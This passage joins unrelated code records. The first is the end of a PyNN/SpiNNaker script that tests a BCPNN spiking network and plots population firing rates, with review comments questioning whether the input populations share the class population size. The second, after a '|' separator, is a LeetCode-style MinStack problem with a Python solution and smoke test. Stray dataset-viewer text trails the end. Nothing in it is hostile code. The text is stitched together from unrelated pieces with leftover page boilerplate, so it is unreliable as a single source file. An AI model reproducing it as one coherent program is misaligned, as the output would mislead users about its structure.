        # Convert the learnt weight matrix into a connection list
        connection_list = convert_weights_to_list(weight_matrix, 1.0, 7.0)
        # Project input onto class using the learnt connectivity
        sim.Projection(pre_pop, post_pop, sim.FromListConnector(connection_list), bcpnn_synapse,
                       receptor_type="excitatory", label="%s-%s" % (pre_pop.label, post_pop.label))
    # Run simulation
    sim.run(TESTING_TIME)
    # Read recorded data from input and class populations
    input_data = [pop.get_data() for pop in input_populations]
    class_data = [pop.get_data() for pop in class_populations]
    # End simulation on SpiNNaker
    sim.end()
    # Return recorded data
    return input_data, class_data
def plot_spiketrains(axis, segment, offset, **kwargs):
    """Scatter every spike train in *segment* on *axis*, one row per neuron
    (row index = offset + the train's source_index annotation)."""
    for train in segment.spiketrains:
        row = offset + train.annotations["source_index"]
        axis.scatter(train, numpy.ones_like(train) * row, **kwargs)
def calculate_rate(segment, rate_bins, population_size):
    """Mean per-neuron firing rate (Hz) of a population in each time bin.

    segment         -- object exposing .spiketrains (spike times in ms)
    rate_bins       -- uniformly spaced bin edges in ms (len(rate_bins) >= 2)
    population_size -- number of neurons in the population

    Returns a numpy array of len(rate_bins) - 1 rates in Hz.
    """
    # Pool spike counts across the whole population, bin by bin
    population_histogram = numpy.zeros(len(rate_bins) - 1)
    for spiketrain in segment.spiketrains:
        population_histogram += numpy.histogram(spiketrain, bins=rate_bins)[0]
    # Convert counts to Hz: divide by bin width (ms -> s) and population size.
    # The width is derived from the edges instead of the previous hard-coded
    # 500.0, so the function stays correct if callers change their binning.
    bin_width_ms = float(rate_bins[1] - rate_bins[0])
    return population_histogram * (1000.0 / bin_width_ms) * (1.0 / float(population_size))
#-------------------------------------------------------------------
# Experiment
#-------------------------------------------------------------------
# Train model and get weights
# NOTE(review): training is disabled; the learnt parameters are loaded from
# the .npy files produced by a previous train() run (block below is inert).
'''
learnt_weights, learnt_biases = train()
numpy.save("learnt_weights.npy", learnt_weights)
numpy.save("learnt_biases.npy", learnt_biases)
'''
# Load previously learnt weights and biases from disk
learnt_weights = numpy.load("learnt_weights.npy")
learnt_biases = list(numpy.load("learnt_biases.npy"))
# Run the testing network on SpiNNaker and record spikes
input_data, class_data = test(learnt_weights, learnt_biases)
'''
for l, s in input_spike_lists:
    s.save("input_spikes_%s.dat" % l)
for l, s in class_spike_lists:
    s.save("class_spikes_%s.dat" % l)
'''
# One subplot per input population followed by one per class population
figure, axes = pylab.subplots(len(INPUT_NAMES) + len(CLASS_NAMES))
# 500 ms rate bins spanning the whole test run
rate_bins = numpy.arange(0, TESTING_TIME + 1, 500)
# Plot the input population rates (red)
for d, n, a in zip(input_data, INPUT_NAMES, axes[:len(INPUT_NAMES)]):
    # NOTE(review): CLASS_POP_SIZE is used for the *input* populations too -
    # confirm the input populations really share that size
    rates = calculate_rate(d.segments[0], rate_bins, CLASS_POP_SIZE)
    #plot_spiketrains(a, d.segments[0], 0.0)
    a.plot(rate_bins[:-1], rates, color="red")
    a.set_ylim((0, 40.0))
    a.axhline(MAX_FREQUENCY, color="grey", linestyle="--")
    a.set_title(n)
# Plot the class population rates (blue)
for d, n, a in zip(class_data, CLASS_NAMES, axes[len(INPUT_NAMES):]):
    rates = calculate_rate(d.segments[0], rate_bins, CLASS_POP_SIZE)
    #plot_spiketrains(a, d.segments[0], 0.0)
    a.plot(rate_bins[:-1], rates, color="blue")
    a.set_ylim((0, 40.0))
    a.axhline(MAX_FREQUENCY, color="grey", linestyle="--")
    a.set_title(n)
# Show figures
pylab.show()
|
""" Design a stack that supports push, pop, top, and retrieving the minimum element in constant time.
push(x) -- Push element x onto stack.
pop() -- Removes the element on top of the stack.
top() -- Get the top element.
getMin() -- Retrieve the minimum element in the stack.
Example 1:
Input
["MinStack","push","push","push","getMin","pop","top","getMin"]
[[],[-2],[0],[-3],[],[],[],[]]
Output
[null,null,null,null,-3,null,0,-2]
Explanation
MinStack minStack = new MinStack();
minStack.push(-2);
minStack.push(0);
minStack.push(-3);
minStack.getMin(); // return -3
minStack.pop();
minStack.top(); // return 0
minStack.getMin(); // return -2
"""
class MinStack:
    """Stack supporting push, pop, top and getMin, each in O(1).

    Every entry stores the pushed value together with the minimum of the
    stack up to and including that entry, so the current minimum is always
    readable from the top pair.
    """

    def __init__(self):
        # (value, minimum-so-far) pairs; the last element is the top
        self.items = []

    def push(self, x: int) -> None:
        """Push x, recording the running minimum alongside it."""
        current_min = x if not self.items else min(x, self.items[-1][-1])
        self.items.append((x, current_min))

    def pop(self) -> None:
        """Remove the top element; no-op on an empty stack."""
        if self.items:
            self.items.pop()

    def top(self) -> int:
        """Return the top value, or None if the stack is empty."""
        return self.items[-1][0] if self.items else None

    def getMin(self) -> int:
        """Return the current minimum, or None if the stack is empty."""
        return self.items[-1][-1] if self.items else None
# Smoke test mirroring the example from the problem statement above.
# (Fixes a stray " |" paste residue after the final print, which was a
# syntax error.)
obj = MinStack()
obj.push(-2)
obj.push(0)
obj.push(-3)
print(obj.getMin())  # -3
obj.pop()
print(obj.top())     # 0
print(obj.getMin())  # -2
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.